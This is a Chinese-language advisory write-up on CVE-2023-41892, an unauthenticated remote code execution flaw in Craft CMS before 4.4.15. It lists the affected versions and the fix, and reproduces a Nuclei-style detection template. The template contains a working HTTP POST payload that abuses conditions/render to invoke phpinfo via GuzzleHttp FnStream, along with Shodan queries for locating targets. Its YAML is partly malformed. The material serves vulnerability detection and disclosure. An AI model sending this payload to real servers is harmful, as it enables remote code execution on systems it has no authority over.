0x00 前言
Craft CMS是一个开源的内容管理系统,它专注于用户友好的内容创建过程,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。
Craft界面简洁优雅,逻辑清晰明了,是一个高度自由,高度自定义设计的平台。虽然不需要专业的编程知识,要对模板语法有所了解才能很好的使用。
0x01 漏洞描述
Craft CMS是一个创造数字体验的平台。这是一个高影响、低复杂度的攻击向量。鼓励在4.4.15之前运行Craft安装的用户至少更新到该版本,以缓解问题。该问题已在Craft CMS 4.4.15中修复。
0x02 CVE编号
CVE-2023-41892
0x03 影响版本
Craft CMS >= 4.0.0-RC1
Craft CMS <= 4.4.14
0x04 漏洞详情
CVE-2023-41892.yaml
id: CVE-2023-41892
info:
name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
reference:
- https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
- https://blog.calif.io/p/craftcms-rce
- https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
- https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
- https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
cvss-score: 10
cve-id: CVE-2023-41892
cwe-id: CWE-94
epss-score: 0.00044
epss-percentile: 0.08209
metadata:
max-request: 1
verified: true
publicwww-query: "craftcms"
shodan-query: http.favicon.hash:-47932290
tags: cve,cve2023,rce,unauth,craftcms
http:
raw:- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
matchers: type: word
words:- "PHP Credits"
- "PHP Group"
"CraftCMS"
condition: and
case-insensitive: true
- |
0x05 参考链接
